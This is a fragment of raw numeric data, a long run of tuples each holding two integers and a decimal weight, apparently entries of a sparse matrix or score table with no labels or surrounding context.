(308, 25187, 0.28),
(258, 25188, 0.91),
(298, 25188, 0.91),
(304, 25188, 0.91),
(308, 25188, 0.91),
(242, 25190, 0.42),
(258, 25190, 0.42),
(298, 25190, 0.42),
(308, 25190, 0.42),
(242, 25191, 0.98),
(258, 25191, 0.98),
(298, 25191, 0.98),
(308, 25191, 0.98),
(298, 25195, 0.28),
(308, 25195, 0.28),
(239, 25195, 0.56),
(44, 25931, 0.32004),
(46, 25931, 0.32004),
(47, 25931, 0.32004),
(48, 25931, 0.32004),
(49, 25931, 0.32004),
(50, 25931, 0.32004),
(193, 28412, 0.32669),
(253, 28412, 0.32669),
(295, 28412, 0.32669),
(238, 28412, 0.65338),
(193, 28538, 0.23331),
(253, 28538, 0.23331),
(178, 28538, 1.16655),
(174, 31999, 0.88669),
(193, 31999, 0.88669),
(244, 31999, 0.88669),
(254, 31999, 0.88669),
(304, 31999, 0.88669),
(306, 31999, 0.88669),
(240, 31999, 1.77338),
(168, 32020, 0.23331),
(178, 32020, 0.23331),
(242, 32020, 0.23331),
(254, 32020, 0.23331),
(256, 32020, 0.23331),
(257, 32020, 0.23331),
(259, 32020, 0.23331),
(260, 32020, 0.23331),
(272, 32020, 0.23331),
(280, 32020, 0.23331),
(287, 32020, 0.23331),
(193, 32020, 0.46662),
(238, 32020, 0.46662),
(193, 32191, 0.18669),
(235, 32191, 0.18669),
(240, 32191, 0.18669),
(254, 32191, 0.18669),
(261, 32191, 0.18669),
(267, 32191, 0.18669),
(304, 32191, 0.18669),
(238, 32191, 1.70688),
(243, 32191, 1.70688),
(193, 32228, 0.93331),
(254, 32228, 0.93331),
(304, 32228, 0.93331),
(193, 32229, 1.00331),
(254, 32229, 1.00331),
(306, 32232, 0.72),
(308, 32232, 0.72),
(193, 32232, 1.44),
(233, 32232, 1.44),
(235, 32232, 1.44),
(236, 32232, 1.44),
(238, 32232, 1.44),
(239, 32232, 1.44),
(240, 32232, 1.44),
(241, 32232, 1.44),
(242, 32232, 1.44),
(243, 32232, 1.44),
(244, 32232, 1.44),
(245, 32232, 1.44),
(246, 32232, 1.44),
(247, 32232, 1.44),
(248, 32232, 1.44),
(249, 32232, 1.44),
(255, 32232, 1.44),
(257, 32232, 1.44),
(258, 32232, 1.44),
(259, 32232, 1.44),
(260, 32232, 1.44),
(261, 32232, 1.44),
(262, 32232, 1.44),
(263, 32232, 1.44),
(264, 32232, 1.44),
(287, 32232, 1.44),
(295, 32232, 1.44),
(298, 32232, 1.44),
(304, 32232, 1.44),
(305, 32232, 1.44),
(239, 36584, 0.28),
(242, 36584, 0.28),
(253, 36584, 0.28),
(256, 36584, 0.28),
(272, 36584, 0.28),
(280, 36584, 0.28),
(255, 36584, 0.56),
(253, 36592, 0.81669),
(254, 36592, 0.81669),
(263, 36592, 0.81669),
(292, 36592, 0.81669),
(262, 36592, 2.45007),
(174, 36594, 0.98),
(253, 36594, 0.98),
(168, 36596, 0.84),
(237, 36596, 0.84),
(239, 36596, 0.84),
(242, 36596, 0.84),
(243, 36596, 0.84),
(253, 36596, 0.84),
(290, 36596, 0.84),
(292, 36596, 1.68),
(253, 36603, 0.86331),
(254, 36603, 0.86331),
(235, 36605, 0.28),
(236, 36605, 0.28),
(243, 36605, 0.28),
(244, 36605, 0.28),
(253, 36605, 0.28),
(264, 36605, 0.28),
(265, 36605, 0.28),
(266, 36605, 0.28),
(269, 36605, 0.28),
(270, 36605, 0.56),
(274, 36605, 0.56),
(301, 36605, 0.56),
(253, 36606, 0.91),
(270, 36606, 0.91),
(301, 36606, 0.91),
(253, 36608, 0.18669),
(263, 36608, 0.18669),
(253, 36611, 0.14),
(273, 36611, 0.14),
(263, 36611, 0.28),
(242, 36611, 0.42),
(274, 36611, 0.42),
(178, 36611, 1.12),
(306, 36611, 1.12),
(254, 36629, 0.18669),
(263, 36629, 0.18669),
(253, 36629, 0.37338),
(236, 36632, 0.32669),
(242, 36632, 0.32669),
(253, 36632, 0.32669),
(259, 36632, 0.32669),
(260, 36632, 0.32669),
(262, 36632, 0.32669),
(288, 36632, 0.32669),
(239, 36632, 0.65338),
(263, 36632, 0.65338),
(270, 36632, 0.65338),
(301, 36632, 0.65338),
(239, 36635, 0.32669),
(253, 36635, 0.32669),
(178, 36716, 0.18669),
(253, 36716, 0.18669),
(254, 36716, 0.18669),
(263, 36716, 0.18669),
(274, 36716, 0.18669),
(306, 36716, 0.18669),
(292, 36716, 0.74676),
(275, 36716, 1.70688),
(236, 36721, 0.32669),
(253, 36721, 0.32669),
(275, 36721, 0.32669),
(236, 36722, 0.98),
(253, 36722, 0.98),
(235, 36724, 0.18669),
(243, 36724, 0.18669),
(256, 36724, 0.18669),
(253, 36724, 0.93345),
(178, 36735, 0.84),
(239, 36735, 0.84),
(240, 36735, 0.84),
(242, 36735, 0.84),
(253, 36735, 0.84),
(305, 36735, 1.68),
(235, 46118, 0.91),
(254, 46118, 0.91),
(238, 46118, 7.41),
(243, 46118, 8.32),
(235, 50973, 0.86331),
(246, 50973, 0.86331),
(256, 50973, 0.86331),
(264, 50973, 0.86331),
(269, 50992, 0.88669),
(235, 50992, 1.77338),
(235, 51016, 0.86331),
(244, 51016, 0.86331),
(238, 51018, 0.37331),
(235, 51018, 0.74662),
(242, 51026, 0.18669),
(235, 51026, 2.64033),
(235, 51059, 0.84),
(240, 51059, 0.84),
(243, 51059, 0.84),
(261, 51059, 0.84),
(235, 51060, 0.93331),
(240, 51060, 0.93331),
(243, 51060, 0.93331),
(261, 51060, 0.93331),
(235, 51148, 0.23331),
(259, 51148, 0.23331),
(260, 51148, 0.23331),
(235, 51165, 0.91),
(267, 51165, 0.91),
(235, 51171, 0.86331),
(258, 51171, 0.86331),
(174, 51173, 0.91),
(235, 51173, 0.91),
(235, 51175, 0.18669),
(236, 51175, 0.18669),
(244, 51175, 0.18669),
(268, 51175, 0.18669),
(290, 51175, 0.18669),
(295, 51175, 0.18669),
(238, 51175, 0.37338),
(242, 51175, 1.12014),
(235, 51178, 0.18669),
(242, 51178, 0.18669),
(247, 51178, 0.18669),
(263, 51178, 0.18669),
(178, 51178, 0.37338),
(243, 51178, 0.37338),
(238, 51178, 0.74676),
(174, 64736, 0.18669),
(193, 64736, 0.18669),
(240, 64736, 0.18669),
(247, 64736, 0.18669),
(259, 64736, 0.18669),
(260, 64736, 0.18669),
(268, 64736, 0.18669),
(272, 64736, 0.18669),
(273, 64736, 0.18669),
(280, 64736, 0.18669),
(288, 64736, 0.18669),
(306, 64736, 0.18669),
(241, 64736, 0.37338),
(244, 64736, 0.93345),
(267, 64736, 0.93345),
(193, 64737, 0.88669),
(240, 64737, 0.88669),
(244, 64737, 0.88669),
(247, 64737, 0.88669),
(259, 64737, 0.88669),
(260, 64737, 0.88669),
(267, 64737, 0.88669),
(268, 64737, 0.88669),
(273, 64737, 0.88669),
(193, 64749, 0.88669),
(256, 64749, 0.88669),
(272, 64749, 0.88669),
(280, 64749, 0.88669),
(193, 64754, 0.86331),
(242, 64754, 0.86331),
(257, 64754, 0.86331),
(193, 64915, 0.18669),
(263, 64915, 0.18669),
(305, 64915, 0.18669),
(244, 64915, 0.37338),
(240, 64915, 0.74676),
(262, 64915, 0.74676),
(193, 64916, 0.88669),
(262, 64916, 0.88669),
(193, 64931, 0.98),
(259, 64931, 0.98),
(260, 64931, 0.98),
(305, 64931, 0.98),
(193, 64932, 0.84),
(240, 64932, 0.84),
(242, 64932, 0.84),
(245, 64936, 0.23331),
(258, 64936, 0.23331),
(261, 64936, 0.23331),
(275, 64936, 0.23331),
(290, 64936, 0.23331),
(306, 64936, 0.23331),
(239, 64936, 0.46662),
(304, 64936, 0.46662),
(193, 64936, 1.16655),
(270, 64936, 1.63317),
(301, 64936, 1.63317),
(239, 64939, 0.88669),
(290, 64939, 0.88669),
(306, 64939, 0.88669),
(304, 64939, 1.77338),
(193, 64939, 3.54676),
(270, 64939, 5.32014),
(301, 64939, 5.32014),
(193, 64945, 0.98),
(262, 64945, 0.98),
(193, 64956, 0.23331),
(259, 64956, 0.23331),
(260, 64956, 0.23331),
(193, 64968, 0.91),
(257, 64968, 0.91),
(258, 64968, 3.64),
(237, 68637, 0.91),
(242, 68637, 0.91),
(254, 68637, 0.91),
(270, 68637, 0.91),
(301, 68637, 0.91),
(304, 68637, 0.91),
(237, 74445, 0.88669),
(238, 74445, 0.88669),
(174, 75642, 0.14),
(240, 75642, 0.14),
(244, 75642, 0.14),
(254, 75642, 0.14),
(261, 75642, 0.14),
(262, 75642, 0.14),
(263, 75642, 0.14),
(265, 75642, 0.14),
(266, 75642, 0.14),
(275, 75642, 0.14),
(243, 75642, 0.28),
(269, 75642, 0.28),
(273, 75642, 0.28),
(288, 75642, 0.28),
(292, 75642, 0.28),
(242, 75642, 0.42),
(272, 75642, 0.42),
(280, 75642, 0.42),
(306, 75642, 0.7),
(238, 75642, 0.84),
(254, 75643, 0.86331),
(272, 75643, 0.86331),
(280, 75643, 0.86331),
(238, 75643, 1.72662),
(254, 75646, 0.88669),
(274, 75646, 0.88669),
(288, 75646, 0.88669),
(239, 75648, 0.91),
(242, 75648, 0.91),
(254, 75648, 0.91),
(256, 75648, 0.91),
(290, 75648, 0.91),
(239, 75649, 0.98),
(242, 75649, 0.98),
(254, 75649, 0.98),
(168, 75650, 0.93331),
(249, 75650, 0.93331),
(254, 75650, 0.93331),
(265, 75650, 0.93331),
(266, 75650, 0.93331),
(174, 75652, 1.02669),
(254, 75652, 1.02669),
(238, 75656, 0.86331),
(239, 75656, 0.86331),
(243, 75656, 0.86331),
(257, 75656, 0.86331),
(258, 75656, 0.86331),
(290, 75656, 0.86331),
(292, 75656, 0.86331),
(304, 75656, 0.86331),
(254, 75656, 1.72662),
(168, 75656, 5.17986),
(254, 75673, 0.14),
(239, 75673, 0.28),
(254, 75784, 1.02669),
(265, 75784, 1.02669),
(266, 75784, 1.02669),
(254, 75788, 0.91),
(265, 75788, 0.91),
(266, 75788, 0.91),
(240, 75791, 0.28),
(254, 75791, 0.28),
(256, 75791, 0.28),
(243, 75791, 0.56),
(255, 75791, 0.56),
(254, 75794, 0.88669),
(256, 75794, 0.88669),
(259, 75794, 0.88669),
(260, 75794, 0.88669),
(254, 75796, 0.18669),
(267, 75796, 0.18669),
(268, 75796, 0.18669),
(275, 75796, 0.18669),
(258, 75796, 0.37338),
(305, 75796, 0.93345),
(236, 77772, 0.95669),
(247, 77772, 0.95669),
(236, 77773, 0.86331),
(249, 77773, 0.86331),
(306, 77773, 0.86331),
(174, 77775, 0.88669),
(236, 77775, 0.88669),
(288, 77775, 0.88669),
(236, 77777, 0.88669),
(257, 77777, 0.88669),
(236, 77781, 0.18669),
(241, 77781, 0.18669),
(257, 77781, 0.18669),
(269, 77781, 0.18669),
(275, 77781, 0.18669),
(288, 77781, 0.18669),
(304, 77781, 0.18669),
(236, 77782, 0.86331),
(241, 77782, 0.86331),
(257, 77782, 0.86331),
(269, 77782, 0.86331),
(275, 77782, 0.86331),
(288, 77782, 0.86331),
(304, 77782, 0.86331),
(259, 77784, 0.23331),
(260, 77784, 0.23331),
(236, 77784, 0.46662),
(168, 77790, 0.88669),
(236, 77790, 0.88669),
(290, 77790, 1.77338),
(236, 77803, 0.28),
(272, 77803, 0.28),
(280, 77803, 0.28),
(290, 77803, 0.56),
(236, 77897, 0.86331),
(257, 77897, 0.86331),
(258, 77897, 0.86331),
(238, 82160, 0.32669),
(240, 82160, 0.32669),
(255, 82160, 0.32669),
(259, 82160, 0.32669),
(260, 82160, 0.32669),
(261, 82160, 0.32669),
(292, 82160, 0.32669),
(237, 84670, 0.93331),
(240, 84670, 0.93331),
(257, 84670, 0.93331),
(237, 84671, 1.07331),
(240, 84671, 1.07331),
(237, 84674, 0.91),
(249, 84674, 0.91),
(241, 84742, 0.28),
(237, 84742, 0.56),
(241, 84743, 0.95669),
(237, 84743, 1.91338),
(237, 84745, 1.07331),
(241, 84745, 1.07331),
(174, 84746, 0.86331),
(237, 84746, 0.86331),
(242, 84746, 0.86331),
(237, 84756, 0.86331),
(247, 84756, 0.86331),
(238, 92201, 0.84),
(288, 92201, 0.84),
(306, 92201, 0.84),
(272, 92201, 1.68),
(280, 92201, 1.68),
(238, 92211, 0.98),
(242, 92211, 0.98),
(238, 92212, 1.05),
(242, 92212, 1.05),
(238, 92218, 0.86331),
(243, 92218, 0.86331),
(290, 92218, 0.86331),
(238, 92219, 0.95669),
(243, 92219, 0.95669),
(290, 92219, 0.95669),
(174, 92222, 0.84),
(238, 92222, 0.84),
(262, 92222, 0.84),
(265, 92222, 0.84),
(266, 92222, 0.84),
(288, 92222, 0.84),
(306, 92222, 0.84),
(272, 92222, 1.68),
(280, 92222, 1.68),
(238, 92227, 0.88669),
(241, 92227, 0.88669),
(290, 92227, 0.88669),
(238, 92228, 0.95669),
(241, 92228, 0.95669),
(178, 92229, 0.84),
(238, 92229, 0.84),
(244, 92229, 0.84),
(249, 92229, 0.84),
(256, 92229, 0.84),
(261, 92229, 0.84),
(262, 92229, 0.84),
(272, 92229, 0.84),
(280, 92229, 0.84),
(248, 92229, 1.68),
(238, 92230, 0.93331),
(244, 92230, 0.93331),
(272, 92230, 0.93331),
(280, 92230, 0.93331),
(238, 92231, 0.98),
(243, 92231, 0.98),
(238, 92234, 0.37331),
(268, 92234, 0.37331),
(238, 92241, 0.98),
(241, 92241, 0.98),
(258, 92241, 0.98),
(264, 92241, 0.98),
(238, 92250, 0.86331),
(247, 92250, 0.86331),
(258, 92250, 0.86331),
(263, 92250, 0.86331),
(269, 92250, 0.86331),
(238, 92258, 0.91),
(258, 92258, 0.91),
(239, 92258, 2.21),
(240, 92258, 2.21),
(242, 92258, 2.21),
(178, 92364, 0.28),
(238, 92364, 0.28),
(168, 92364, 0.56),
(168, 92372, 0.28),
(240, 92372, 0.28),
(262, 92372, 0.28),
(287, 92372, 0.28),
(305, 92372, 0.28),
(238, 92372, 0.56),
(238, 92377, 0.32669),
(240, 92377, 0.32669),
(238, 92380, 0.28),
(243, 92380, 0.28),
(238, 92383, 0.14),
(258, 92383, 0.14),
(263, 92383, 0.14),
(240, 92388, 0.98),
(238, 92388, 1.96),
(238, 92389, 0.95669),
(259, 92389, 0.95669),
(260, 92389, 0.95669),
(261, 92389, 0.95669),
(292, 92389, 0.95669),
(238, 92393, 0.86331),
(247, 92393, 0.86331),
(258, 92393, 0.86331),
(304, 92393, 0.86331),
(267, 92393, 1.72662),
(238, 92395, 1.00331),
(258, 92395, 1.00331),
(238, 92399, 0.91),
(242, 92399, 0.91),
(238, 92405, 0.86331),
(263, 92405, 0.86331),
(239, 100431, 0.32669),
(243, 100431, 0.32669),
(246, 100431, 0.32669),
(264, 100431, 0.32669),
(265, 100431, 0.32669),
(266, 100431, 0.32669),
(305, 100431, 0.32669),
(239, 100436, 0.84),
(257, 100436, 0.84),
(304, 100436, 0.84),
(269, 100442, 0.95669),
(306, 100442, 0.95669),
(239, 100442, 1.91338),
(243, 100445, 0.91),
(268, 100445, 0.91),
(288, 100445, 0.91),
(292, 100445, 0.91),
(239, 100445, 1.82),
(306, 100445, 1.82),
(239, 100457, 0.88669),
(247, 100457, 0.88669),
(263, 100457, 0.88669),
(239, 100458, 1.00331),
(263, 100458, 1.00331),
(239, 100461, 0.86331),
(242, 100461, 0.86331),
(239, 100466, 0.88669),
(242, 100466, 0.88669),
(243, 100466, 0.88669),
(239, 100474, 1.07331),
(268, 100474, 1.07331),
(239, 100475, 1.02669),
(248, 100475, 1.02669),
(304, 100475, 1.02669),
(305, 100475, 1.02669),
(239, 100487, 0.88669),
(257, 100487, 0.88669),
(239, 100488, 0.98),
(257, 100488, 0.98),
(239, 100491, 0.95669),
(259, 100491, 0.95669),
(260, 100491, 0.95669),
(263, 100491, 1.91338),
(239, 100637, 0.91),
(243, 100637, 0.91),
(239, 100642, 0.91),
(240, 100642, 1.82),
(239, 100644, 0.28),
(240, 100644, 0.28),
(241, 100644, 0.28),
(292, 100644, 0.28),
(305, 100644, 0.28),
(239, 100645, 1.00331),
(240, 100645, 1.00331),
(239, 100646, 1.05),
(240, 100646, 1.05),
(239, 100647, 0.18669),
(261, 100647, 0.18669),
(267, 100647, 0.18669),
(268, 100647, 0.18669),
(240, 100647, 0.37338),
(306, 100647, 0.37338),
(242, 100647, 0.74676),
(239, 100648, 0.86331),
(242, 100648, 0.86331),
(261, 100648, 0.86331),
(267, 100648, 0.86331),
(268, 100648, 0.86331),
(240, 100648, 1.72662),
(306, 100648, 1.72662),
(239, 100649, 0.95669),
(268, 100649, 0.95669),
(239, 100655, 0.37331),
(243, 100655, 0.74662),
(255, 101983, 0.32669),
(259, 101983, 0.32669),
(260, 101983, 0.32669),
(242, 101988, 0.91),
(255, 101988, 0.91),
(242, 101990, 0.88669),
(256, 101990, 0.88669),
(265, 101990, 0.88669),
(266, 101990, 0.88669),
(255, 101990, 4.43345),
(255, 101996, 0.18669),
(178, 101996, 0.37338),
(243, 102003, 0.28),
(255, 102003, 0.28),
(178, 102003, 0.84),
(178, 102006, 0.88669),
(255, 102006, 2.15339),
(240, 102008, 0.86331),
(255, 102008, 0.86331),
(257, 102020, 0.91),
(255, 102020, 1.82),
(255, 102023, 1.05),
(258, 102023, 1.05),
(268, 102023, 1.05),
(305, 102023, 2.1),
(174, 102081, 0.18669),
(255, 102081, 0.18669),
(268, 102081, 0.18669),
(274, 102081, 0.18669),
(243, 110233, 0.18669),
(258, 110233, 0.18669),
(259, 110233, 0.18669),
(260, 110233, 0.18669),
(272, 110233, 0.18669),
(280, 110233, 0.18669),
(240, 110233, 0.37338),
(257, 110233, 0.37338),
(306, 110233, 0.37338),
(247, 110236, 0.28),
(257, 110236, 0.28),
(306, 110236, 0.56),
(257, 110254, 7.22019),
(260, 110254, 7.22019),
(240, 110260, 0.18669),
(257, 110260, 0.18669),
(304, 110260, 0.93345),
(257, 110337, 0.86331),
(259, 110337, 0.86331),
(260, 110337, 0.86331),
(262, 110337, 0.86331),
(306, 110337, 0.86331),
(243, 110337, 1.72662),
(246, 110344, 0.91),
(257, 110344, 0.91),
(241, 115179, 0.88669),
(256, 115179, 0.88669),
(263, 115179, 0.88669),
(306, 115179, 0.88669),
(243, 115179, 2.66007),
(258, 115184, 0.32669),
(256, 115184, 0.65338),
(243, 115261, 0.18669),
(256, 115261, 0.18669),
(259, 115269, 0.84),
(260, 115269, 0.84),
(256, 115269, 2.52),
(256, 115270, 0.91),
(259, 115270, 0.91),
(260, 115270, 0.91),
(178, 115274, 0.88669),
(256, 115274, 0.88669),
(275, 115274, 0.88669),
(243, 115279, 0.86331),
(256, 115279, 0.86331),
(263, 115279, 0.86331),
(274, 115279, 0.86331),
(306, 115279, 0.86331),
(243, 115280, 0.95669),
(256, 115280, 0.95669),
(256, 115281, 0.93331),
(273, 115281, 0.93331),
(242, 115283, 0.91),
(256, 115283, 0.91),
(268, 115283, 0.91),
(272, 115285, 0.91),
(280, 115285, 0.91),
(256, 115285, 1.82),
(256, 115288, 0.42),
(242, 115288, 1.68),
(241, 116408, 0.91),
(242, 116408, 0.91),
(242, 117673, 0.23331),
(290, 117673, 0.23331),
(240, 117673, 0.46662),
(240, 117688, 0.18669),
(242, 117688, 0.18669),
(243, 117688, 0.18669),
(262, 117688, 0.18669),
(273, 117688, 0.18669),
(292, 117688, 0.18669),
(244, 117688, 0.37338),
(258, 117688, 0.74676),
(240, 117875, 0.23331),
(242, 117875, 0.23331),
(249, 117875, 0.23331),
(272, 117875, 0.23331),
(280, 117875, 0.23331),
(240, 117920, 0.98),
(242, 117920, 0.98),
(267, 117920, 0.98),
(306, 117920, 0.98),
(270, 147343, 0.93331),
(292, 147343, 0.93331),
(301, 147343, 0.93331),
(240, 147343, 1.86662),
(240, 147345, 1.02669),
(270, 147345, 1.02669),
(301, 147345, 1.02669),
(178, 147362, 0.23331),
(240, 147362, 0.23331),
(292, 147362, 0.23331),
(258, 147362, 0.46662),
(240, 147366, 0.28),
(244, 147366, 0.28),
(240, 147369, 0.32669),
(265, 147369, 0.32669),
(266, 147369, 0.32669),
(240, 147372, 0.18669),
(246, 147372, 0.37338),
(240, 147378, 0.86331),
(267, 147378, 0.86331),
(290, 147378, 0.86331),
(240, 147386, 0.88669),
(245, 147386, 0.88669),
(258, 147386, 0.88669),
(275, 147386, 0.88669),
(248, 147386, 2.66007),
(168, 147390, 0.88669),
(240, 147390, 0.88669),
(249, 147531, 0.46669),
(287, 147531, 0.46669),
(240, 147531, 1.86676),
(240, 147548, 0.18669),
(248, 147548, 0.18669),
(274, 147548, 0.18669),
(245, 147548, 0.37338),
(240, 147553, 0.93331),
(243, 147553, 0.93331),
(240, 147555, 0.14),
(249, 147555, 0.14),
(259, 147555, 0.14),
(260, 147555, 0.14),
(240, 147568, 0.86331),
(262, 147568, 0.86331),
(240, 147578, 0.86331),
(258, 147578, 0.86331),
(262, 147578, 0.86331),
(263, 147578, 0.86331),
(270, 147578, 0.86331),
(301, 147578, 0.86331),
(240, 147586, 0.95669),
(261, 147586, 0.95669),
(240, 147592, 1.00331),
(274, 147592, 1.00331),
(240, 147593, 0.23331),
(272, 147593, 0.23331),
(280, 147593, 0.23331),
(242, 149507, 0.88669),
(259, 149507, 0.88669),
(260, 149507, 0.88669),
(242, 149508, 0.95669),
(259, 149508, 0.95669),
(260, 149508, 0.95669),
(242, 149515, 0.88669),
(243, 149515, 0.88669),
(292, 149515, 0.88669),
(242, 149535, 0.88669),
(262, 149535, 0.88669),
(258, 149535, 1.77338),
(242, 149587, 0.88669),
(243, 149587, 0.88669),
(258, 149587, 0.88669),
(242, 149773, 0.86331),
(258, 149773, 0.86331),
(273, 149773, 0.86331),
(304, 149773, 0.86331),
(270, 149773, 3.45324),
(301, 149773, 3.45324),
(243, 157355, 0.91),
(258, 157355, 1.82),
(243, 157356, 1.00331),
(258, 157356, 1.00331),
(174, 157364, 0.88669),
(243, 157364, 0.88669),
(269, 157364, 0.88669),
(243, 157366, 0.95669),
(258, 157366, 0.95669),
(174, 157491, 0.91),
(243, 157491, 0.91),
(243, 157496, 0.95669),
(275, 157496, 0.95669),
(272, 157513, 0.18669),
(280, 157513, 0.18669),
(174, 157513, 0.37338),
(243, 157513, 0.56007),
(174, 157516, 0.88669),
(243, 157516, 1.77338),
(243, 157519, 0.23331),
(244, 157519, 0.23331),
(290, 157519, 0.23331),
(241, 159280, 0.37331),
(261, 159280, 0.37331),
(241, 159290, 7.22019),
(261, 159290, 7.22019),
(241, 159382, 0.88669),
(262, 159382, 0.88669),
(241, 159384, 0.86331),
(248, 159384, 0.86331),
(258, 159384, 0.86331),
(270, 159384, 0.86331),
(301, 159384, 0.86331),
(241, 159385, 0.93331),
(258, 159385, 0.93331),
(270, 159385, 0.93331),
(301, 159385, 0.93331),
(241, 159386, 0.91),
(259, 159386, 0.91),
(260, 159386, 0.91),
(262, 159386, 1.82),
(241, 159404, 0.23331),
(261, 159404, 0.23331),
(265, 159404, 0.23331),
(266, 159404, 0.23331),
(241, 159405, 0.93331),
(265, 159405, 0.93331),
(266, 159405, 0.93331),
(241, 159409, 0.93331),
(178, 159409, 2.79993),
(178, 159410, 1.00331),
(241, 159410, 1.00331),
(258, 163239, 0.46662),
(259, 163239, 0.69993),
(260, 163239, 0.69993),
(258, 163245, 0.91),
(268, 163245, 0.91),
(306, 163245, 0.91),
(258, 163247, 0.95669),
(262, 163247, 0.95669),
(168, 163253, 0.93331),
(258, 163253, 0.93331),
(258, 163355, 0.88669),
(265, 163355, 0.88669),
(266, 163355, 0.88669),
(258, 163357, 0.88669),
(265, 163357, 0.88669),
(266, 163357, 0.88669),
(305, 163357, 0.88669),
(258, 163393, 0.88669),
(268, 163393, 0.88669),
(242, 168933, 0.81669),
(262, 168933, 0.81669),
(263, 168933, 0.81669),
(273, 168933, 0.81669),
(242, 168935, 0.88669),
(261, 168935, 0.88669),
(292, 168935, 0.88669),
(178, 168961, 0.23331),
(242, 168961, 0.46662),
(178, 168964, 0.88669),
(242, 168964, 0.88669),
(245, 168979, 0.28),
(262, 168979, 0.28),
(242, 168979, 1.12),
(168, 168988, 0.84),
(242, 168988, 0.84),
(263, 168988, 0.84),
(242, 168991, 0.86331),
(267, 168991, 0.86331),
(168, 168991, 1.72662),
(242, 169005, 0.86331),
(274, 169005, 0.86331),
(242, 169007, 0.88669),
(247, 169007, 0.88669),
(267, 169007, 0.88669),
(265, 169007, 1.77338),
(266, 169007, 1.77338),
(242, 169008, 0.98),
(247, 169008, 0.98),
(265, 169008, 0.98),
(266, 169008, 0.98),
(178, 169013, 0.91),
(242, 169013, 0.91),
(242, 169181, 0.88669),
(249, 169181, 0.88669),
(272, 169181, 0.88669),
(280, 169181, 0.88669),
(242, 169240, 0.28),
(248, 169240, 0.28),
(249, 169240, 0.28),
(242, 169241, 0.91),
(248, 169241, 0.91),
(249, 169241, 0.91),
(259, 173517, 0.95669),
(260, 173517, 0.95669),
(259, 173518, 1.05),
(260, 173518, 1.05),
(259, 173519, 1.02669),
(260, 173519, 1.02669),
(259, 173520, 1.12),
(260, 173520, 1.12),
(259, 173521, 1.86662),
(260, 173521, 1.86662),
(259, 173522, 2.05338),
(260, 173522, 2.05338),
(259, 173523, 1.86662),
(260, 173523, 1.86662),
(259, 173524, 1.14331),
(260, 173524, 1.14331),
(259, 173525, 1.02669),
(260, 173525, 1.02669),
(259, 173526, 1.02669),
(260, 173526, 1.02669),
(259, 173527, 1.21331),
(260, 173527, 1.21331),
(259, 173528, 0.98),
(260, 173528, 0.98),
(259, 173529, 1.07331),
(260, 173529, 1.07331),
(259, 173530, 0.98),
(260, 173530, 0.98),
(259, 173531, 1.16669),
(260, 173531, 1.16669),
(259, 173532, 0.93331),
(260, 173532, 0.93331),
(259, 173533, 1.16669),
(260, 173533, 1.16669),
(259, 173534, 0.95669),
(260, 173534, 0.95669),
(259, 173535, 1.12),
(260, 173535, 1.12),
(259, 173536, 1.86662),
(260, 173536, 1.86662),
(259, 173537, 1.07331),
(260, 173537, 1.07331),
(259, 173538, 1.00331),
(260, 173538, 1.00331),
(259, 173539, 0.91),
(260, 173539, 0.91),
(259, 173540, 1.09669),
(260, 173540, 1.09669),
(259, 173541, 0.93331),
(260, 173541, 0.93331),
(259, 173542, 1.05),
(260, 173542, 1.05),
(259, 173543, 1.00331),
(260, 173543, 1.00331),
(259, 173544, 1.09669),
(260, 173544, 1.09669),
(259, 173545, 0.95669),
(260, 173545, 0.95669),
(268, 173545, 0.95669),
(259, 173546, 1.07331),
(260, 173546, 1.07331),
(259, 173547, 7.22019),
(263, 173547, 7.22019),
(304, 173547, 7.22019),
(259, 173549, 1.07331),
(260, 173549, 1.07331),
(259, 173550, 1.00331),
(260, 173550, 1.00331),
(259, 173551, 1.09669),
(260, 173551, 1.09669),
(259, 173552, 1.07331),
(260, 173552, 1.07331),
(268, 173552, 1.07331),
(259, 173553, 0.88669),
(260, 173553, 0.88669),
(259, 173554, 0.95669),
(260, 173554, 0.95669),
(259, 173555, 1.00331),
(260, 173555, 1.00331),
(259, 173556, 1.09669),
(260, 173556, 1.09669),
(259, 173557, 0.95669),
(260, 173557, 0.95669),
(259, 173558, 1.16669),
(260, 173558, 1.16669),
(259, 173606, 0.93331),
(260, 173606, 0.93331),
(259, 173607, 1.02669),
(260, 173607, 1.02669),
(259, 173608, 0.32669),
(260, 173608, 0.32669),
(259, 173609, 0.95669),
(260, 173609, 0.95669),
(259, 173610, 1.07331),
(260, 173610, 1.07331),
(259, 173611, 2.19338),
(260, 173611, 2.19338),
(259, 173612, 0.84),
(260, 173612, 0.84),
(259, 173613, 0.93331),
(260, 173613, 0.93331),
(259, 173614, 1.07331),
(260, 173614, 1.07331),
(267, 173614, 1.07331),
(272, 173614, 1.07331),
(275, 173614, 1.07331),
(280, 173614, 1.07331),
(288, 173614, 1.07331),
(259, 173615, 0.95669),
(260, 173615, 0.95669),
(259, 173616, 0.98),
(260, 173616, 0.98),
(269, 173616, 0.98),
(270, 173616, 0.98),
(301, 173616, 0.98),
(259, 173617, 0.86331),
(260, 173617, 0.86331),
(259, 173618, 0.93331),
(260, 173618, 0.93331),
(259, 173619, 1.09669),
(260, 173619, 1.09669),
(259, 173620, 0.93331),
(260, 173620, 0.93331),
(259, 173621, 1.02669),
(260, 173621, 1.02669),
(246, 173622, 0.88669),
(259, 173622, 0.88669),
(260, 173622, 0.88669),
(262, 173622, 0.88669),
(272, 173622, 0.88669),
(274, 173622, 0.88669),
(280, 173622, 0.88669),
(259, 173623, 1.05),
(260, 173623, 1.05),
(259, 173624, 1.14331),
(260, 173624, 1.14331),
(259, 173625, 0.91),
(260, 173625, 0.91),
(259, 173626, 1.14331),
(260, 173626, 1.14331),
(259, 173627, 1.05),
(260, 173627, 1.05),
(259, 173628, 1.14331),
(260, 173628, 1.14331),
(259, 173629, 1.05),
(260, 173629, 1.05),
(259, 173630, 1.00331),
(260, 173630, 1.00331),
(274, 175844, 0.84),
(261, 175844, 1.68),
(178, 176758, 1.77338),
(244, 176758, 1.77338),
(168, 176781, 0.86331),
(244, 176781, 0.86331),
(178, 176791, 0.88669),
(244, 176791, 0.88669),
(244, 176798, 0.88669),
(267, 176798, 0.88669),
(246, 182404, 0.14),
(262, 182404, 0.14),
(262, 185567, 0.18669),
(287, 185567, 0.18669),
(174, 185567, 0.37338),
(161, 189539, 0.93331),
(161, 189540, 1.16669),
(161, 189541, 0.18669),
(161, 189542, 0.93331),
(161, 189543, 1.14331),
(161, 189544, 0.23331),
(161, 189545, 0.93331),
(161, 189546, 1.00331),
(161, 189604, 0.28),
(161, 189605, 1.14331),
(161, 189606, 1.35331),
(161, 189607, 0.98),
(161, 189608, 1.12),
(161, 189609, 0.23331),
(161, 189610, 1.00331),
